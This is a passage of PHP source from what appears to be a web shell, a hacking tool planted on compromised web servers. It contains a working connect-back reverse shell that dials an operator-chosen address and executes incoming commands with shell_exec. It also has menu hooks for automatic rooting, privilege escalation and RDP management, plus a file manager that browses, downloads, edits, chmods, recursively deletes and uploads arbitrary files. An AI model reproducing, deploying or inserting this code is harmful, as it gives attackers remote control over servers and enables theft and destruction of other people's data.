$fp = @fsockopen($mip, $bport, $errno, $errstr, 30);
if (!$fp) {
echo "Error: $errstr ($errno)";
} else {
fwrite($fp, "\n*********************************************\n");
fwrite($fp, "Welcome to Connect Back Shell\n");
fwrite($fp, "*********************************************\n\n");
while (!feof($fp)) {
fwrite($fp, "shell$ ");
$cmd = fgets($fp, 4096);
$result = shell_exec(trim($cmd));
fwrite($fp, $result);
}
fclose($fp);
}
echo "</pre></div>";
}
}
// Auto Root
else if ($id == "auto-root") {
auto_root();
}
// Manual Privilege Escalation
else if ($id == "manual-escalation") {
manual_privilege_escalation();
}
// RDP Manager
else if ($id == "rdp") {
rdp_manager();
}
// File Manager
else if ($id == "fm") {
$homedir = getcwd();
$dir = getValue($_GET, 'dir', $homedir);
$dir = realpath($dir);
if ($dir === false || !is_dir($dir)) {
$dir = $homedir;
}
echo "<div class='content'>
<h2>File Manager</h2>
<p><strong>Home:</strong> $homedir</p>
<form action='' method='GET'>
<input type='hidden' name='id' value='fm'>
<strong>Path:</strong>
<input type='text' name='dir' value='" . htmlspecialchars($dir) . "' style='width: 70%; padding: 8px;'>
<input type='submit' value='Go' class='btn'>
</form>
<br>";
echo "<table>
<tr>
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Actions</th>
</tr>";
// Navigasi ke parent directory
if ($dir !== DIRECTORY_SEPARATOR) {
$parent = dirname($dir);
echo "<tr>
<td colspan='4'><a href='?id=fm&dir=" . urlencode($parent) . "'><strong>[Parent Directory]</strong></a></td>
</tr>";
}
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if ($file == "." || $file == "..") continue;
$filepath = $dir . DIRECTORY_SEPARATOR . $file;
$is_dir = is_dir($filepath);
$size = $is_dir ? "-" : round(filesize($filepath) / 1024, 2) . " KB";
$perms = substr(sprintf('%o', fileperms($filepath)), -4);
echo "<tr>
<td>";
if ($is_dir) {
echo "<a href='?id=fm&dir=" . urlencode($filepath) . "'><strong>$file/</strong></a>";
} else {
echo $file;
}
echo "</td>
<td>$size</td>
<td>$perms</td>
<td nowrap>";
if (!$is_dir) {
echo "<a href='?fdownload=" . urlencode($filepath) . "'>Download</a> | ";
echo "<a href='?fedit=" . urlencode($filepath) . "' target='_blank'>Edit</a> | ";
}
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
echo "<a href='?fchmod=" . urlencode($filepath) . "'>Chmod</a> | ";
}
echo "<a href='?fdelete=" . urlencode($filepath) . "' onclick='return confirm(\"Are you sure you want to delete this?\");'>Delete</a>
</td>
</tr>";
}
closedir($handle);
}
echo "</table>
<br>
<h3>Upload File</h3>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='hidden' name='MAX_FILE_SIZE' value='10000000' />
<input type='hidden' name='Fupath' value='" . htmlspecialchars($dir) . "'>
<input name='userfile' type='file' />
<input type='submit' value='Upload File' class='btn' />
</form>
</div>";
}
// Handle file upload
if (isset($_FILES['userfile']) && isset($_POST['Fupath'])) {
$upload_dir = getValue($_POST, 'Fupath');
$upload_file = $upload_dir . DIRECTORY_SEPARATOR . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $upload_file)) {
echo "<script>alert('File uploaded successfully!');</script>";
} else {
echo "<script>alert('Error uploading file!');</script>";
}
echo "<script>window.location.href = '?id=fm&dir=" . urlencode($upload_dir) . "';</script>";
}
// Handle file deletion
$fdelete = getValue($_GET, 'fdelete');
if ($fdelete !== "") {
$fdelete = realpath($fdelete);
if ($fdelete !== false && file_exists($fdelete)) {
if (is_dir($fdelete)) {
// Delete directory recursively
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($fdelete, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($files as $fileinfo) {
if ($fileinfo->isDir()) {
rmdir($fileinfo->getRealPath());
} else {
unlink($fileinfo->getRealPath());
}
}
rmdir($fdelete);
} else {
unlink($fdelete);
}
echo "<script>alert('Deleted successfully!');</script>";
} else {
echo "<script>alert('Error deleting file!');</script>";
}
echo "<script>history.back();</script>";
exit;
}
?>
</div>
</body>
</html>